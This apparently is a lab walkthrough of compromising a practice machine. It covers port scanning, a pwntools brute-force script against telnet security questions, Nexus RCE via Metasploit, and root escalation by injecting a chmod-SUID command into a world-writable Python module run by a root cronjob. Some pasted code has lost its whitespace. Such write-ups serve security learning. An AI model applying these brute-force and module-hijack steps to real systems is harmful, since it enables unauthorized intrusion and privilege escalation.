$ nmap -p- --min-rate 4000 -Pn 192.168.240.159
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 11:22 +08
Nmap scan report for 192.168.240.159
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
23/tcp open telnet
8081/tcp open blackice-icecap
Telnet Creds -> Nexus RCE
Port 8081 was hosting a vulnerable version of Nexus Repository Manager:
This version has RCE exploits, but we need credentials.
Weak credentials like admin:admin or nexus:nexus didn't work. In this case, let's check out out Telnet on port 23.
$ nc -vn 192.168.240.159 23
(UNKNOWN) [192.168.240.159] 23 (telnet) open
====================
NEXUS BACKUP MANAGER
====================
ANSONE Answer question one
ANSTWO Answer question two
BACKUP Perform backup
EXIT Exit
HELP Show help
HINT Show hints
RECOVER Recover admin password
RESTORE Restore backup
We can somehow recover the password from this. We can interact with this application a bit:
HINT
1.What is your zodiac sign?
2.What is your favorite color?
RECOVER
Please Enter Password
RECOVER <password>
ANSONE
Please Enter Answer
ANSONE <answer>
I wasn't sure how to get this, so let's use the ANSONE and ANSTWO options to check our options. I made a list of colours and zodiac signs:
capricorn
aquarius
aries
libra
scorpio
virgo
taurus
pisces
gemini
leo
cancer
sagittarius
Afterwards, we can create a Python script to brute force out the answer based on this.
from pwn import*definteract(word): r =remote('192.168.240.159', 23)for i inrange(11): r.recvline() r.sendline(b'ANSONE') r.recvline() r.recvline() r.sendline(word.encode()) response = r.recvline()if b'Incorrect'in response: r.close()else: log.info("Correct!") log.info(f"Password is {word}") r.close()defmain():withopen ('colours.txt', 'r')as file:for line in file:interact(line)main()
This would slowly brute force the first answer, which is black:
$ python3 brute.py
<TRUNCATED>
[+] Opening connection to 192.168.240.159 on port 23: Done
[*] Correct!
[*] Password is black
[*] Closed connection to 192.168.240.159 port 23
Now we can do the same for the zodiac signs and ANSTWO.
[+] Opening connection to 192.168.240.159 on port 23: Done
[*] Correct!
[*] Password is leo
[*] Closed connection to 192.168.240.159 port 23
So the correct answers are 'black' and 'leo'. We can create a wordlist with these words, which is just:
black
leo
leoblack
blackleo
blackleo is the correct password:
RECOVER
Please Enter Password
RECOVER <password>
blackleo
3e409e89-514c-4f9f-955e-dfa5c4083518
Using this, we can run the exploit with these parameters:
I had a lot of trouble getting a shell on this machine for some reason. Eventually, I just decided to use msfconsole to exploit this.
Privilege Escalation
Cronjob -> Python Module Hijack
I ran a linpeas.sh scan on the machine and found an interesting permission set:
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
<TRUNCATED>
/usr/lib/python3.8
/usr/lib/python3.8/base64.py
We can write to base64.py, which is the module being used here. I ran pspy64 as well to see if this file was being executed in anyway.
The file was also owned by root, meaning that this likely being generated by the logcrypt cronjob. I just echoed in import os;os.system("chmod u+s /bin/bash") within the base64.py file and it worked!
nexus@sona:/usr/lib/python3.8$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-xr-x 1 root root 1183448 Jun 18 2020 /bin/bash
